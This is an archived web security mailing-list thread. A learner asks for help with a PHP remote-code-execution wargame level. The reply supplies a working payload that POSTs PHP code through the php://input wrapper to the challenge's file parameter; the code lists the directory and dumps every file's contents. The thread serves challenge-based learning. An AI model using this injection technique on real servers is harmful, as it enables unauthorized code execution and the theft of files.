[WEB SECURITY] A request for help for a challenge

evandrix evandrix at gmail.com
Wed Apr 29 03:31:12 EDT 2015


HTTP POST to http://level3.tasteless.eu/?file=php://input
executing: <?$d=dir(getcwd());echo"<pre>path:".$d-
>path.PHP_EOL;while(($file=$d->read())!==false)
{echo"filename:".$file.PHP_EOL.file_get_contents($file).PHP_EOL;}echo"
</pre>";$d->close();?>

Cris Noob <cloakbot <at> hotmail.com> writes:

> 
> 
> Hello. I was told you guys might be able to help me out. I've been dared 
to complete this challenge and execute remote code on a server, but I'm 
stuck.Basically, here's what I know:http://pastebin.com/p89CGcrhIn case 
you're wondering, this is not for malicious purposes, I'm simply learning by 
completing one of the challenges 
here:http://tasteless.phpnet.us/level_3.phpI've been googling for hours but 
I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI, 
I simply need to provide some php code with a GET or POST request and get it 
executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST 
request done via a web proxy, and it worked when I removed the part of the 
script that appends .html to the string. I'm not sure how to remotely 
disable the part that appends .html, so that's basically what I'm looking 
for. %00 is blocked (i think? It's not working). Other than that, I'm 
looking for any other possible solutions to the problem as well, not just 
this php://input solution.I was hoping you guys would like a challenge 
Thanks for your time,Cris
> 
> 
> _______________________________________________
> The Web Security Mailing List
> 
> WebSecurity RSS Feed
> http://www.webappsec.org/rss/websecurity.rss
> 
> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> 
> WASC on Twitter
> http://twitter.com/wascupdates
> 
> websecurity <at> lists.webappsec.org
> 
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
> 








More information about the websecurity mailing list